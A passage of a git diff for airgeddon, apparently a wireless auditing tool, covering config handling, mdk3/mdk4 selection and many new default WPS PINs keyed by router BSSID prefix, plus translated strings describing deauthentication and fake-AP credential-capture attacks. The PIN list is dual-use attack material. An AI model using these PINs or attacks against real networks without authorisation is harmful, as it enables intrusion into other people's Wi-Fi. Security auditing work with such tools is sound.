boolean_options_env_vars["${ordered_options_env_vars[8]},default_value"]="false" - boolean_options_env_vars["${ordered_options_env_vars[9]},default_value"]="false" boolean_options_env_vars["${ordered_options_env_vars[10]},default_value"]="false" + boolean_options_env_vars["${ordered_options_env_vars[11]},default_value"]="false" boolean_options_env_vars["${ordered_options_env_vars[0]},rcfile_text"]="#Enabled true / Disabled false - Auto update feature (it has no effect on development mode) - Default value ${boolean_options_env_vars[${ordered_options_env_vars[0]},'default_value']}" boolean_options_env_vars["${ordered_options_env_vars[1]},rcfile_text"]="#Enabled true / Disabled false - Skip intro (it has no effect on development mode) - Default value ${boolean_options_env_vars[${ordered_options_env_vars[1]},'default_value']}" @@ -13594,8 +14107,8 @@ function env_vars_initialization() { boolean_options_env_vars["${ordered_options_env_vars[6]},rcfile_text"]="#Enabled true / Disabled false - Print help hints on menus - Default value ${boolean_options_env_vars[${ordered_options_env_vars[6]},'default_value']}" boolean_options_env_vars["${ordered_options_env_vars[7]},rcfile_text"]="#Enabled true / Disabled false - Enable 5Ghz support (it has no effect if your cards are not 5Ghz compatible cards) - Default value ${boolean_options_env_vars[${ordered_options_env_vars[7]},'default_value']}" boolean_options_env_vars["${ordered_options_env_vars[8]},rcfile_text"]="#Enabled true / Disabled false - Force to use iptables instead of nftables (it has no effect if nftables are not present) - Default value ${boolean_options_env_vars[${ordered_options_env_vars[8]},'default_value']}" - boolean_options_env_vars["${ordered_options_env_vars[9]},rcfile_text"]="#Enabled true / Disabled false - Development mode for faster development skipping intro and all initial checks - Default value ${boolean_options_env_vars[${ordered_options_env_vars[9]},'default_value']}" - boolean_options_env_vars["${ordered_options_env_vars[10]},rcfile_text"]="#Enabled true / Disabled false - Debug mode for development printing debug information - Default value ${boolean_options_env_vars[${ordered_options_env_vars[10]},'default_value']}" + boolean_options_env_vars["${ordered_options_env_vars[10]},rcfile_text"]="#Enabled true / Disabled false - Development mode for faster development skipping intro and all initial checks - Default value ${boolean_options_env_vars[${ordered_options_env_vars[9]},'default_value']}" + boolean_options_env_vars["${ordered_options_env_vars[11]},rcfile_text"]="#Enabled true / Disabled false - Debug mode for development printing debug information - Default value ${boolean_options_env_vars[${ordered_options_env_vars[10]},'default_value']}" readarray -t ENV_VARS_ELEMENTS < <(printf %s\\n "${!nonboolean_options_env_vars[@]} ${!boolean_options_env_vars[@]}" | cut -d, -f1 | sort -u) readarray -t ENV_BOOLEAN_VARS_ELEMENTS < <(printf %s\\n "${!boolean_options_env_vars[@]}" | cut -d, -f1 | sort -u) @@ -13624,10 +14137,10 @@ function env_vars_values_validation() { eval "export $(grep "${item}" "${scriptfolder}${rc_file}")" else if echo "${ARRAY_ENV_BOOLEAN_VARS_ELEMENTS[@]}" | grep -q "${item}"; then - export ${item}=${boolean_options_env_vars["${item}",'default_value']} + eval "export ${item}=${boolean_options_env_vars[${item},'default_value']}" errors_on_configuration_vars["${item},missing_var"]="${boolean_options_env_vars[${item},'default_value']}" elif echo "${ARRAY_ENV_NONBOOLEAN_VARS_ELEMENTS[@]}" | grep -q "${item}"; then - export ${item}=${nonboolean_options_env_vars["${item}",'default_value']} + eval "export ${item}=${nonboolean_options_env_vars[${item},'default_value']}" errors_on_configuration_vars["${item},missing_var"]="${nonboolean_options_env_vars[${item},'default_value']}" fi fi @@ -13637,7 +14150,7 @@ function env_vars_values_validation() { for item in "${ARRAY_ENV_BOOLEAN_VARS_ELEMENTS[@]}"; do if ! [[ "${!item,,}" =~ ^(true|false)$ ]]; then errors_on_configuration_vars["${item},invalid_value"]="${boolean_options_env_vars[${item},'default_value']}" - export ${item}=${boolean_options_env_vars["${item}",'default_value']} + eval "export ${item}=${boolean_options_env_vars[${item},'default_value']}" fi done @@ -13645,7 +14158,12 @@ function env_vars_values_validation() { if [ "${item}" = "AIRGEDDON_WINDOWS_HANDLING" ]; then if ! [[ "${!item,,}" =~ ^(xterm|tmux)$ ]]; then errors_on_configuration_vars["${item},invalid_value"]="${nonboolean_options_env_vars[${item},'default_value']}" - export ${item}=${nonboolean_options_env_vars["${item}",'default_value']} + eval "export ${item}=${nonboolean_options_env_vars[${item},'default_value']}" + fi + elif [ "${item}" = "AIRGEDDON_MDK_VERSION" ]; then + if ! [[ "${!item,,}" =~ ^(mdk3|mdk4)$ ]]; then + errors_on_configuration_vars["${item},invalid_value"]="${nonboolean_options_env_vars[${item},'default_value']}" + eval "export ${item}=${nonboolean_options_env_vars[${item},'default_value']}" fi fi done @@ -13956,9 +14474,11 @@ function get_tmux_process_id() { debug_print - local process_pid - local process_cmd_line if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then + + local process_cmd_line + local process_pid + process_cmd_line=$(echo "${1}" | tr -d '"') while [ -z "${process_pid}" ]; do process_pid=$(ps --no-headers aux | grep "${process_cmd_line}" | grep -v "grep ${process_cmd_line}" | awk '{print $2}') @@ -14040,12 +14560,11 @@ function main() { if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "xterm" ]; then check_xwindow_system detect_screen_resolution - else - essential_tools_names=(${essential_tools_names[@]/xterm/tmux}) - possible_package_names[${essential_tools_names[7]}]="tmux" - unset possible_package_names["xterm"] fi + iptables_nftables_detection + set_mdk_version + dependencies_modifications set_possible_aliases initialize_optional_tools_values @@ -14106,7 +14625,6 @@ function main() { check_update_tools fi - iptables_nftables_detection print_configuration_vars_issues initialize_extended_colorized_output set_windows_sizes @@ -14413,7 +14931,7 @@ function remove_warnings() { echo "${clean_handshake_dependencies[@]}" > /dev/null 2>&1 echo "${aircrack_attacks_dependencies[@]}" > /dev/null 2>&1 echo "${aireplay_attack_dependencies[@]}" > /dev/null 2>&1 - echo "${mdk4_attack_dependencies[@]}" > /dev/null 2>&1 + echo "${mdk_attack_dependencies[@]}" > /dev/null 2>&1 echo "${hashcat_attacks_dependencies[@]}" > /dev/null 2>&1 echo "${et_onlyap_dependencies[@]}" > /dev/null 2>&1 echo "${et_sniffing_dependencies[@]}" > /dev/null 2>&1 @@ -14430,6 +14948,7 @@ function remove_warnings() { echo "${asleap_attacks_dependencies[@]}" > /dev/null 2>&1 echo "${john_attacks_dependencies[@]}" > /dev/null 2>&1 echo "${johncrunch_attacks_dependencies[@]}" > /dev/null 2>&1 + echo "${enterprise_certificates_dependencies[@]}" > /dev/null 2>&1 echo "${is_arm}" > /dev/null 2>&1 } diff --git a/binaries/arch/airgeddon-git-9.20-1-any.pkg.tar.xz b/binaries/arch/airgeddon-git-9.20-1-any.pkg.tar.xz deleted file mode 100644 index 4b27aa208..000000000 Binary files a/binaries/arch/airgeddon-git-9.20-1-any.pkg.tar.xz and /dev/null differ diff --git a/binaries/arch/airgeddon-git-9.21-1-any.pkg.tar.xz b/binaries/arch/airgeddon-git-9.21-1-any.pkg.tar.xz new file mode 100644 index 000000000..dfec17296 Binary files /dev/null and b/binaries/arch/airgeddon-git-9.21-1-any.pkg.tar.xz differ diff --git a/binaries/kali/airgeddon_9.20-1_all.deb b/binaries/kali/airgeddon_9.20-1_all.deb deleted file mode 100644 index ca826acf5..000000000 Binary files a/binaries/kali/airgeddon_9.20-1_all.deb and /dev/null differ diff --git a/binaries/kali/airgeddon_9.21-1_all.deb b/binaries/kali/airgeddon_9.21-1_all.deb new file mode 100644 index 000000000..dc3563212 Binary files /dev/null and b/binaries/kali/airgeddon_9.21-1_all.deb differ diff --git a/imgs/banners/buymeacoffee.png b/imgs/banners/buymeacoffee.png new file mode 100644 index 000000000..6149fe71d Binary files /dev/null and b/imgs/banners/buymeacoffee.png differ diff --git a/imgs/wiki/airgeddon_scrs1.png b/imgs/wiki/airgeddon_scrs1.png index 93aba8248..cf9dbeeb9 100644 Binary files a/imgs/wiki/airgeddon_scrs1.png and b/imgs/wiki/airgeddon_scrs1.png differ diff --git a/imgs/wiki/airgeddon_scrs10.png b/imgs/wiki/airgeddon_scrs10.png index 6263ccb64..dc7526e31 100644 Binary files a/imgs/wiki/airgeddon_scrs10.png and b/imgs/wiki/airgeddon_scrs10.png differ diff --git a/imgs/wiki/airgeddon_scrs2.png b/imgs/wiki/airgeddon_scrs2.png index 61c31049b..fe026ca19 100644 Binary files a/imgs/wiki/airgeddon_scrs2.png and b/imgs/wiki/airgeddon_scrs2.png differ diff --git a/imgs/wiki/airgeddon_scrs6.png b/imgs/wiki/airgeddon_scrs6.png index 0d0fe5419..a45e33ac8 100644 Binary files a/imgs/wiki/airgeddon_scrs6.png and b/imgs/wiki/airgeddon_scrs6.png differ diff --git a/imgs/wiki/airgeddon_scrs8.png b/imgs/wiki/airgeddon_scrs8.png index b93c45656..086593842 100644 Binary files a/imgs/wiki/airgeddon_scrs8.png and b/imgs/wiki/airgeddon_scrs8.png differ diff --git a/known_pins.db b/known_pins.db index 08d5a09af..55d5c61b1 100644 --- a/known_pins.db +++ b/known_pins.db @@ -2,7 +2,7 @@ #Title........: known_pins.db #Description..: This is a WPS PIN database for routers that generate generic passwords. #Author.......: v1s1t0r -#Date.........: 20190415 +#Date.........: 20190712 #Bash Version.: 4.2 or later #Set PIN database. Keys are the first 6 bssid digits and are ordered @@ -44,6 +44,7 @@ function set_pin_database() { PINDB["001AEF"]="12345670" PINDB["001B11"]="84794079 36494002" PINDB["001C28"]="38377433" + PINDB["001CDF"]="40770765" PINDB["001D19"]="66026402 12345670" PINDB["001D6A"]="88171449 12345670" PINDB["001D73"]="88420707" @@ -65,12 +66,12 @@ function set_pin_database() { PINDB["002191"]="28423737 82744458 07364679" PINDB["002202"]="12345670" PINDB["00223F"]="48247818" - PINDB["00226B"]="59900887" - PINDB["002275"]="12885381 25751118 14989346 53704825 34922453 29221790 44058685" + PINDB["00226B"]="59900887 14335068" + PINDB["002275"]="12885381 25751118 14989346 53704825 34922453 29221790 44058685 38243899 23124684 22478481 80795438 62288644" PINDB["002293"]="92854048 92937208" PINDB["0022B0"]="35860167" PINDB["0022F7"]="60530004 25853209 23096004 26834481" - PINDB["002369"]="51348014 37591267" + PINDB["002369"]="51348014 37591267 37842048" PINDB["0023CD"]="54080812 21379666" PINDB["002401"]="97744757 10987957 91866882 78671294 45558221 60530004 31011193 81320820" PINDB["002417"]="31011193 84207302" @@ -116,6 +117,7 @@ function set_pin_database() { PINDB["011DCF"]="11234555" PINDB["021018"]="00022169 20172527" PINDB["048D38"]="01234567 61499065" + PINDB["049226"]="42401605" PINDB["04C06F"]="08182173 35404187 08776297 04759386" PINDB["081074"]="20956455 20912505" PINDB["081076"]="63458374" @@ -129,15 +131,17 @@ function set_pin_database() { PINDB["08EDB9"]="86925583" PINDB["0C54A5"]="82585297" PINDB["0C722C"]="80554448" + PINDB["0C8063"]="24838023" PINDB["0C96BF"]="12345670" PINDB["0C96E6"]="12345678" PINDB["100D7F"]="53172297" PINDB["105F06"]="58829431" + PINDB["107B44"]="03061053" PINDB["107BEF"]="38163289" PINDB["10BEF5"]="30543362" PINDB["10BF48"]="04032052" PINDB["10C61F"]="22643223" - PINDB["10FEED"]="18382501 00246330 96238936 08825270 93878845 57275062" + PINDB["10FEED"]="18382501 00246330 96238936 08825270 93878845 57275062 01878738 41349489" PINDB["14144B"]="36286034" PINDB["14A9E3"]="00288729 03617984 00265744 00344463" PINDB["14B968"]="51321086" @@ -147,12 +151,13 @@ function set_pin_database() { PINDB["14DAE9"]="81103980" PINDB["17AD1E"]="12345670" PINDB["182861"]="59229933" - PINDB["18A6F7"]="05150960" - PINDB["18D6C7"]="07338526" + PINDB["18A6F7"]="05150960 88767000 75829544 60631596" + PINDB["18D6C7"]="07338526 01742671 09410176 66378617 17075404" PINDB["18F145"]="21143892" PINDB["1915C1"]="12345670" PINDB["19DCED"]="45678965" PINDB["1A0B40"]="17068161" + PINDB["1C5F2B"]="69865879" PINDB["1C740D"]="15843128" PINDB["1C7EE5"]="76229909 37967635 92433960 22609298 60418579 60206732 27343043 65126141 43580293" PINDB["1CAFF7"]="48612661 50928248 12663309 00448864 20164065 98134496 60629890" @@ -174,26 +179,35 @@ function set_pin_database() { PINDB["241FA0"]="12345678" PINDB["28107B"]="46264848 20172527 21464065" PINDB["28285D"]="66202240" + PINDB["283B82"]="26517643" PINDB["285FDB"]="08007117 00009980" PINDB["28BE9B"]="52721113" PINDB["28C68E"]="27161395" + PINDB["2C4D54"]="09103214" + PINDB["2C56DC"]="41052068" PINDB["2C957F"]="07144721" PINDB["2CAB25"]="12345670 47888777 34412916 18625790 14393426 10847138 70205404 33736082" PINDB["2CAEE4"]="21464065" PINDB["2CB05D"]="27257210 52231858 11534624 72522233 19537511 42375852 70092523 17054850 87205732 11239208 74155279 87221541 92085251 52718380 46218230 09820852 23950313 07753695 42375852 75863869 12090006 37523077 06686635 45476013 38941476 54510555 33033631 12523146" + PINDB["2CFDA1"]="05835010" PINDB["3039F2"]="16538061 16702738 18355604 88202907 73767053 43297917 19756967 13409708 11967859 12820078 05537303 11915140 13880996 15116574 15584151 17342711 17368759 18511000 19142029 19783871 21158766 24100489 47148826 64630113 74184095 75886264 77828491 78551312 92537309 94862423 18001907 12345670" PINDB["30469A"]="27334959 37489014 37496081 37494650 37490034 40184708 40166148 19482417 30592407 30176683 95221021 27016497 33102320 21703003 30022645 38940972" + PINDB["305A3A"]="89039830" PINDB["30918F"]="78365230" PINDB["340804"]="36022656 93395274 39837875 23556676" PINDB["34080F"]="56364675" PINDB["344B50"]="13419622" PINDB["344DEA"]="87972122" + PINDB["3497F6"]="43218141" + PINDB["34BA9A"]="73235880" PINDB["34CDBE"]="09656802" PINDB["38229D"]="00779876 05537303 11967859 12749355 13409708 13849238 15116574 16538061 16811836 19986951 26427195 29942275 42497868 47148826 75284930 77828491 88202907 92537309" + PINDB["382C4A"]="90998980" PINDB["3859F9"]="12475407" PINDB["386077"]="12345670 94380507" PINDB["3872C0"]="15624697 12345678 18811728 20172527 18836486 12345678 00029186 49385052 12715657 16035232 19117652" PINDB["389939"]="38993923" + PINDB["38D547"]="21200502" PINDB["3C4711"]="12345678" PINDB["3C81D6"]="76629909" PINDB["3C81D8"]="31957199" @@ -207,14 +221,16 @@ function set_pin_database() { PINDB["4C60DE"]="01322934 42473534 22958143 53550866 31836289 22297235 31015424" PINDB["4C72B9"]="82585297 96606674 20661731" PINDB["4C8BEF"]="04260681 85064409" + PINDB["4CEDFB"]="85121003" PINDB["4CFB45"]="63666922 60998125" PINDB["4E26D4"]="51217563" - PINDB["50465D"]="83010910 46540010 21101021 51504472 01101027 64214306" + PINDB["50465D"]="83010910 46540010 21101021 51504472 01101027 64214306 32120127" PINDB["5067F0"]="20064525 66026402 12608065 12204786" - PINDB["5404A6"]="69923326 31028325" + PINDB["5404A6"]="69923326 31028325 38014789" PINDB["5422F8"]="12345670" PINDB["5465DE"]="65979754" PINDB["546EFC"]="02917092" + PINDB["54B80A"]="48616584" PINDB["54BEF7"]="19280066 82585297" PINDB["54D46F"]="11199083 99731281" PINDB["54E6FC"]="53525659 66394662 41942826 93464239 96517062 00846363 53473226 14204968" @@ -227,7 +243,7 @@ function set_pin_database() { PINDB["5C571A"]="46577450" PINDB["5CD998"]="11554424 67554409 22630964" PINDB["5CF96A"]="54353640" - PINDB["60E327"]="36743025 56163926 20102043 23956544 34125335 83476532 86227728 09845237 59642114 31486811 26790732 08791320 24890687 09981331 48122726 38142178 47477445" + PINDB["60E327"]="36743025 56163926 20102043 23956544 34125335 83476532 86227728 09845237 59642114 31486811 26790732 08791320 24890687 09981331 48122726 38142178 47477445 28381204" PINDB["623DFF"]="52029288" PINDB["6253D4"]="21884603" PINDB["626BD3"]="25415001 73609605 72931806" @@ -241,7 +257,7 @@ function set_pin_database() { PINDB["6444B3"]="48838924" PINDB["646637"]="89285701" PINDB["6466B3"]="33357553 99807986 34519523 58576816 42973409 15636447 59228738 49971606 23629769 87120448 00967907 81890576" - PINDB["647002"]="76627705 17141390 84909053 83123412 18756784 05549566 89786048 39031457 51325671 56098389 51512064 01672145 09571051 86711654" + PINDB["647002"]="76627705 17141390 84909053 83123412 18756784 05549566 89786048 39031457 51325671 56098389 51512064 01672145 09571051 86711654 70782905" PINDB["6487D7"]="31506519 16825321 18708622 64578835" PINDB["64D954"]="34198131" PINDB["687F74"]="42901174 68623227 94126198 58743249" @@ -261,7 +277,9 @@ function set_pin_database() { PINDB["6ACBA8"]="48385923" PINDB["6CFDB9"]="11171409" PINDB["6F3AC8"]="72895443" + PINDB["704D7B"]="01670011" PINDB["705681"]="16538061" + PINDB["708BCD"]="05208807" PINDB["72088B"]="42860808" PINDB["721D67"]="04432326" PINDB["72233D"]="36228645" @@ -300,7 +318,7 @@ function set_pin_database() { PINDB["803F5D"]="85173057" PINDB["80B686"]="38484636" PINDB["80D09B"]="19355801" - PINDB["8416F9"]="17744683 59669210" + PINDB["8416F9"]="17744683 59669210 06866723 48588584 28721611 66667629 65680483 40553078" PINDB["841B5E"]="78100053 21120374 48062435 06042547 07017643 29167012 73312055 11996361" PINDB["84742B"]="12345670" PINDB["849CA6"]="12345670" @@ -320,12 +338,12 @@ function set_pin_database() { PINDB["90F652"]="95817149 20917784 56738209 59820000 31315036 65723081 85438996 87883282 26555898 01715224 31581431 61296879 15094148 26412948 91090430 31718851 51979850 56339420 59955467 78110830 91191229 23619128 44538811 64836157 76556098 09834811 44938161 12345670 51161484 70231540 80335092 94966503 96932407 93661171 09489530 64776835 57644660 33046518 42823551 71083490 62530248 47081116 43701742 49759051 73964759 81431472 13496654 80777229 02325385 31969529 59020905" PINDB["90F656"]="44632267" PINDB["940C6D"]="06292379 61465275" - PINDB["944452"]="15310828 29874590 08318725 17579957 26023809 93645348 08983954 88154473 73532866 40011851 06835590 90017810" + PINDB["944452"]="15310828 29874590 08318725 17579957 26023809 93645348 08983954 88154473 73532866 40011851 06835590 90017810 49071924 12604821 79488082 80733409 81050925" PINDB["944A0C"]="41238806" PINDB["94FEF4"]="43944552" PINDB["988B5D"]="12345670" PINDB["9897D1"]="07266881 10705513 85713642 29342273 84280848 63201048 30726437 73691365 34474242 18297492 61969063 15848789 28230274" - PINDB["98DED0"]="12345678" + PINDB["98DED0"]="12345678 04888703" PINDB["98F537"]="13415679" PINDB["98FC11"]="21421112 99756666 33617503 55132909" PINDB["9C9726"]="06699437" @@ -336,10 +354,11 @@ function set_pin_database() { PINDB["A021B7"]="39149138 41252147 80324560 82581507 25815078 22813503 11352464 47624313 92442559 81121496 43454044 86559256 33440279 15880208 53134424 72218013 01874341 43135479 51920104 26515274 84361455 71202358 12345679 01318104" PINDB["A0648F"]="51327330" PINDB["A08E78"]="62306157" - PINDB["A0AB1B"]="44384494" + PINDB["A0AB1B"]="44384494 85016279" PINDB["A0EC80"]="21970726 12345670" PINDB["A0F3C1"]="03919934" PINDB["A42B8C"]="21047015" + PINDB["A42BB0"]="36172856" PINDB["A4526F"]="16538061 16702738 18355604 43297917 73767053 88202907 19756967 13409708 94862423 00779876 11161189 11915140 11967859 12820078 13588106 13849238 14058400 14522529 15116574 15397812 15584151 17908214 18001907 18511000 19783871 21362767 24100489 42497868 45014451 47148826 75886264 77828491 78551312 91403902 15328366 15938718 12345679 45550867" PINDB["A4B1E9"]="75090753" PINDB["A62148"]="67541270" @@ -348,10 +367,12 @@ function set_pin_database() { PINDB["AA8DD3"]="03053447" PINDB["AABBCC"]="76334693" PINDB["AC220B"]="20172527" + PINDB["AC9E17"]="02104003" PINDB["ACE87B"]="77502896" PINDB["AE6240"]="39184412" PINDB["B0487A"]="61116597 53171801 65822234 31400206 06465179 18668872 22637307 40176451 37493691 57739601 40184708 40166148 37505073 61116597 37494506 37494063 37489014 37496081 37494650 37490034 54335677 71625089 44860936 42686774 30643229 67375219 55427586" PINDB["B05B67"]="30366367 31187688" + PINDB["B06EBF"]="64327709" PINDB["B0B2DC"]="47866591" PINDB["B246FC"]="96799208" PINDB["B40C2A"]="75033941" @@ -373,24 +394,24 @@ function set_pin_database() { PINDB["BF06F4"]="20607470" PINDB["C025E9"]="89346259 08645616" PINDB["C03F0E"]="25032918 45445402 49945386 41138571 13250003 09302525 14516894 83143632 63247435 94751345 50615056 30702073 53363480" - PINDB["C04A00"]="46182661 15706065 15268976 23682351 76746864 21249051 51644048" + PINDB["C04A00"]="46182661 15706065 15268976 23682351 76746864 21249051 51644048 35747888" PINDB["C054A5"]="12345678" PINDB["C07CD1"]="49070897" PINDB["C0AC54"]="12345670" PINDB["C0C1C0"]="78985933 04840954 96405628 63797435 27905814 01101110 64382913" PINDB["C0F8DA"]="51542252" PINDB["C43DC7"]="82234515 63753349 20388560 20205287 51419981" - PINDB["C46E1F"]="11695059 73307334" - PINDB["C4E984"]="72914908 79016018" + PINDB["C46E1F"]="11695059 73307334 36545780" + PINDB["C4E984"]="72914908 79016018 84847621" PINDB["C528D2"]="95685656" PINDB["C81760"]="12345678" - PINDB["C83A35"]="28818885 01756401 11195207 11203124 11210085 11214809 11215042 11213840 11194569 11195764 11214885 11216643 05365852 48343763 61724242 12345678 60641687 15002648 61436800 18698800 02814087 38015687 23664173 62047043" + PINDB["C83A35"]="28818885 01756401 11195207 11203124 11210085 11214809 11215042 11213840 11194569 11195764 11214885 11216643 05365852 48343763 61724242 12345678 60641687 15002648 61436800 18698800 02814087 38015687 23664173 62047043 11651123" PINDB["C83DD4"]="12345670" PINDB["C85195"]="13113889" - PINDB["C86000"]="46264848 66916468" + PINDB["C86000"]="46264848 66916468 33452548" PINDB["C86C87"]="53488954 42566212 71033884 83961984 40172910 04337706 40309125 41152256 43468379" PINDB["C8BE19"]="73457756" - PINDB["C8D3A3"]="21464065 20172527 17084215 12345670 19951683 13950132" + PINDB["C8D3A3"]="21464065 20172527 17084215 12345670 19951683 13950132 03411964" PINDB["C8D5FE"]="12345678" PINDB["C8D719"]="90291333" PINDB["CC1AFB"]="12345670" @@ -402,9 +423,11 @@ function set_pin_database() { PINDB["D0AEEE"]="75277048" PINDB["D0D412"]="16538061 16702738 18355604 88202907 73767053 43297917 19756967 13409708 11161189 11915140 12749355 13588106 14145629 24100489 42497868 47148826 77828491" PINDB["D42122"]="00187558" - PINDB["D46E0E"]="43285632 64843018" + PINDB["D46E0E"]="43285632 64843018 76446825" PINDB["D47BB0"]="14550911 98852413 70795660 20859978 13090586 67774128 14738340 11317890 53741134 22388414 72768198 11651659 83914829 36956074 11277576 16007666 29342273 18297492" + PINDB["D80D17"]="68325312" PINDB["D80F99"]="12345670" + PINDB["D850E6"]="42642107" PINDB["D85D4C"]="73448907 13262204 11997870" PINDB["D86194"]="71537573 10009321 31348034 18794786 15738370 18546774 47415270 63742336 93782302" PINDB["D86CE9"]="10864111 20172527 15624697" @@ -424,17 +447,19 @@ function set_pin_database() { PINDB["E0CB4E"]="62987523 49884388" PINDB["E24136"]="89817841 29612000 19107011 92008601 15763297" PINDB["E43ED7"]="29187386 60551085 07281808 78232099 37706937 12345670" + PINDB["E46F13"]="25753257" PINDB["E4C146"]="71537573 10009321 31348034 18794786 15738370 18546774 47415270 63742336 93782302 24248907 63668346 96453780 00000001" PINDB["E839DF"]="14309489" PINDB["E840F2"]="12345670 82585297 94380507" - PINDB["E894F6"]="45892066 36264957 25289794 36129836" + PINDB["E894F6"]="45892066 36264957 25289794 36129836 16065420 69476150" PINDB["E8ABFA"]="11192091" PINDB["E8CD2D"]="32151688" PINDB["E8D11B"]="46240255 30859098 16615519 08935946 40033990 66543404" - PINDB["E8DE27"]="68663803 83331817 92674639 96323472 82398903 20422394 92292208 33030265 00934527 41322581 43537525 39078070 91439093 49312263" + PINDB["E8DE27"]="68663803 83331817 92674639 96323472 82398903 20422394 92292208 33030265 00934527 41322581 43537525 39078070 91439093 49312263 41511398 60267115" PINDB["E8ED05"]="51192174" PINDB["E8F1B0"]="76308574 46264848 76229909" PINDB["EB40F2"]="12345670" + PINDB["EC086B"]="18775655" PINDB["EC1A59"]="19366838" PINDB["EC43F6"]="95076522" PINDB["ECC146"]="71537573" @@ -446,7 +471,7 @@ function set_pin_database() { PINDB["F43E62"]="12345670" PINDB["F4C714"]="79072205" PINDB["F4EC38"]="32066968 26599625 05181667 99195038 18674095 48555524 12345678 25933291 48291477 45266065 66683407 82188184 86697934 11542216 62887485 91726681 41185315 96781593 09165847 04898702 42768777 23380622 67971862 11288879 03419724 72344071 19634173 95048147 51660567 52594809 82853600 05884889 44947477 44762810 25575583 85091153 75913038 50413812 62884785 15970039 67556366 18741452" - PINDB["F4F26D"]="60384164 36308729 13454050 68280048 62718943 56769814" + PINDB["F4F26D"]="60384164 36308729 13454050 68280048 62718943 56769814 46292230 30307223 81561360 46247384" PINDB["F59B36"]="60960542" PINDB["F8038E"]="12345670" PINDB["F80FD9"]="12345670" diff --git a/language_strings.sh b/language_strings.sh index 1c5858247..9346823bf 100644 --- a/language_strings.sh +++ b/language_strings.sh @@ -2,7 +2,7 @@ #Title........: language_strings.sh #Description..: All the translated strings that airgeddon uses are located here. #Author.......: v1s1t0r -#Date.........: 20190416 +#Date.........: 20190812 #Bash Version.: 4.2 or later #Set language_strings file version @@ -11,7 +11,7 @@ function set_language_strings_version() { debug_print - language_strings_version="9.20-1" + language_strings_version="9.21-1" } #Set different language text strings @@ -25,6 +25,10 @@ function language_strings() { declare -gA wps_data_array fi + if [[ "$(declare -p interfaces_band_info 2> /dev/null)" != "declare -A"* ]]; then + declare -gA interfaces_band_info + fi + declare -A unknown_chipset unknown_chipset["ENGLISH"]="Unknown" unknown_chipset["SPANISH"]="Desconocido" @@ -154,7 +158,7 @@ function language_strings() { et_misc_texts["ITALIAN",3]="Ips forniti dal DHCP a possibili clienti collegati" et_misc_texts["POLISH",3]="Adresy IP przydzielane przez DHCP do połączonych potencjalnych klientów" et_misc_texts["GERMAN",3]="Ips durch DHCP an mögliche verbundene Clients geliefert" - et_misc_texts["TURKISH",3]="Olası bağlanmış istemcilere verilen DHCP ipler" + et_misc_texts["TURKISH",3]="Olası bağlanmış istemcilere verilen DHCP IPler" et_misc_texts["ENGLISH",4]="On this attack you have to use an external sniffer to try to obtain client passwords connected to the network" et_misc_texts["SPANISH",4]="Con este ataque has de usar un sniffer externo para intentar obtener contraseñas de los clientes conectados a la red" @@ -274,7 +278,7 @@ function language_strings() { et_misc_texts["ITALIAN",13]="Inviare" et_misc_texts["POLISH",13]="Wyślij" et_misc_texts["GERMAN",13]="Schicken" - et_misc_texts["TURKISH",13]="Tamam" + et_misc_texts["TURKISH",13]="Gönder" et_misc_texts["ENGLISH",14]="An unexpected error occurred, redirecting to the main screen" et_misc_texts["SPANISH",14]="Ha ocurrido un error inesperado, redirigiendo a la pantalla principal" @@ -749,7 +753,7 @@ function language_strings() { enterprise_texts["ITALIAN",4]="Con questo attacco, aspetteremo che un cliente ci dia un hash o la sua password per la rete wifi Enterprise attraverso il nostro AP falso. Hai selezionato la modalità \"noisy\", quindi l'attacco non si fermerà finché non premi il tasto [Enter] nella schermata principale" enterprise_texts["POLISH",4]="W tym ataku poczekamy aż klient poda nam skrót lub hasło do sieci wifi Enterprise w naszym fałszywym AP. Wybrałeś tryb \"noisy\" więc atak nie zostanie zatrzymany dopóki nie naciśniesz klawisza [Enter] na głównym ekranie" enterprise_texts["GERMAN",4]="Mit diesem Angriff werden wir darauf warten, dass uns ein Kunde einen Hash oder sein Passwort für das Enterprise Wi-Fi-Netzwerk in unserem gefälschten AP gibt. Sie haben den \"noisy\" Modus gewählt, der Angriff wird somit nicht stoppen, bis Sie die [Enter]-Taste auf dem Hauptbildschirm drücken" - enterprise_texts["TURKISH",4]="${pending_of_translation} Bu saldırı ile, bir clientin sahte AP'deki Enterprise wifi ağı için bize bir karma veya şifresini vermesini bekleyeceğiz. \"noisy\" modunu seçtiniz, bu yüzden ana ekranda [Enter] tuşuna basana kadar saldırı durmayacak" + enterprise_texts["TURKISH",4]="Bu saldırı ile, bir clientin sahte AP'deki Enterprise wifi ağı için bize bir hash veya şifresini vermesini bekleyeceğiz. \"noisy\" modunu seçtiniz, bu yüzden ana ekranda [Enter] tuşuna basana kadar saldırı durmayacak" enterprise_texts["ENGLISH",5]="Last captured user" enterprise_texts["SPANISH",5]="Último usuario capturado" @@ -1269,17 +1273,17 @@ function language_strings() { arr["GERMAN",34]="Die ausgewählte Interface ${current_iface_on_messages} befindet sich im monitor Modus. Der Angriff kann ausgeführt werden" arr["TURKISH",34]="Seçilen arayüz ${current_iface_on_messages} izleme modunda. Saldırı yapılabilir" - arr["ENGLISH",35]="Deauthentication / Dissasociation mdk4 attack chosen (monitor mode needed)" - arr["SPANISH",35]="Elegido ataque de Desautenticación / Desasociación mdk4 (modo monitor requerido)" - arr["FRENCH",35]="L'attaque de Dés-authentification / Dissociation mdk4 a été choisie (mode moniteur nécessaire)" - arr["CATALAN",35]="Seleccionat atac de Desautenticació / Dissociació mdk4 (es requereix mode monitor)" - arr["PORTUGUESE",35]="Ataque de desautenticação com mdk4 (modo monitor obrigatório)" - arr["RUSSIAN",35]="Выбрана mdk4 атака Деаутентификации / Разъединения (необходим режим монитора)" - arr["GREEK",35]="Deauthentication / Έχει επιλεχθεί επίθεση dissasociation mdk4 (χρειάζεται η κατάσταση παρακολούθησης)" - arr["ITALIAN",35]="Attacco Deauth / Disassociation mdk4 scelto (modalità monitor richiesta)" - arr["POLISH",35]="Wybrano atak Deauthentication / Disassociation mdk4 (wymagany tryb monitorowania)" - arr["GERMAN",35]="Deauthentication / Disassociation mdk4 Angriff ausgewählt (monitor-Modus erforderlich)" - arr["TURKISH",35]="Deauthentication / Dissasociation mdk4 saldırısı seçildi (izleme modu gereklidir)" + arr["ENGLISH",35]="Deauthentication / Dissasociation ${mdk_command} attack chosen (monitor mode needed)" + arr["SPANISH",35]="Elegido ataque de Desautenticación / Desasociación ${mdk_command} (modo monitor requerido)" + arr["FRENCH",35]="L'attaque de Dés-authentification / Dissociation ${mdk_command} a été 